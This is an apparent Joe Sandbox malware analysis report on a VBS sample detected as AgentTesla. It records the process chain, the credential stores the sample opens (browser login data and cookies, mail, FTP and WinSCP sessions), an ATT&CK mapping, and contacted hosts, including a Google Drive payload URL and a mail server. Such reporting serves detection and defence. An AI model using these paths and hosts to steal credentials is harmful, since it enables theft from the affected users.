Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 20_2_0850DE20 CreateNamedPipeW,

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Source: Yara match	File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	Boot or Logon Initialization Scripts	212 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	115 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	221 Scripting	1 Credentials in Registry	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 PowerShell	Logon Script (Mac)	Logon Script (Mac)	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PUMP mt310143121.vbs	2%	ReversingLabs
PUMP mt310143121.vbs	8%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
mail.prgisi.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	100%	Avira URL Cloud	malware
https://contoso.com/License	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Virustotal		Browse
https://contoso.com/License	0%	Virustotal		Browse
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://mail.prgisi.com	0%	Avira URL Cloud	safe
https://api.ipify.org%mail.prgisi.comjcvaleroso	0%	Avira URL Cloud	safe
https://sectigo.com/CPS	0%	Avira URL Cloud	safe
https://a1BgY4r4bA.comt-	0%	Avira URL Cloud	safe
https://contoso.com/	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
https://a1BgY4r4bA.com	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	Avira URL Cloud	safe
http://AzAPmg.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.186.46	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false		high
mail.prgisi.com	216.218.206.36	true	false	0%, Virustotal, Browse	unknown
doc-04-9o-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://nuget.org/NuGet.exe	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/y	CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.prgisi.com	CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%mail.prgisi.comjcvaleroso	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6h	CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072883437.0000000001531000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5727289842.0000000001531000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS	CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a1BgY4r4bA.comt-	CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://aka.ms/pscore6lB	powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-04-9o-docs.googleusercontent.com/	CasPol.exe, 0000001A.00000003.2072435740.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5716278615.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://a1BgY4r4bA.com	CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5766354780.000000001DCAA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://AzAPmg.com	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
216.218.206.36	mail.prgisi.com	United States	36103	CENTRALUTAHUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715071
Start date and time:	2022-10-03 16:07:48 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 46s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PUMP mt310143121.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@12/12@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 40.117.96.136, 13.107.5.88
Excluded domains from analysis (whitelisted): evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, e-0009.e-msedge.net, wdcp.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, img-prod-cms-rt-microsoft-com.akamaized.net, manage.devcenter.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:12:55	API Interceptor	38x Sleep call for process: powershell.exe modified
16:13:35	API Interceptor	2098x Sleep call for process: CasPol.exe modified

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.841989710132343
Encrypted:	false
SSDEEP:	192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
MD5:	677C4E3A07935751EA3B092A5E23232F
SHA1:	0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
SHA-256:	D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
SHA-512:	253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\RESA2B2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.987028301890633
Encrypted:	false
SSDEEP:	24:HMe9E2vqBsH4xwKPfwI+ycuZhNBakSPPNnqSqd:HqCJKPo1ulBa3NqSK
MD5:	52B4F8ED3B88EC328D89EF36A2050866
SHA1:	9EE5A85E073EFDEF69CDDA098C884C4E9A48EAF9
SHA-256:	AD16D4C2B70950D1D7EA3CB0F7F8611E8081A3BAD3B1832618ED42F45DC79436
SHA-512:	69865D18E3E7672D055292086418F27C006C3B7371392457E9C4431CB14DEF2C4848F0E9306C0B214323E3D0FD311800CD9A4C5C908DC09CFA46A2D7FAE677DC
Malicious:	false
Preview:	L.....:c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP...................{C.......e..........5.......C:\Users\user\AppData\Local\Temp\RESA2B2.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.5.x.x.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
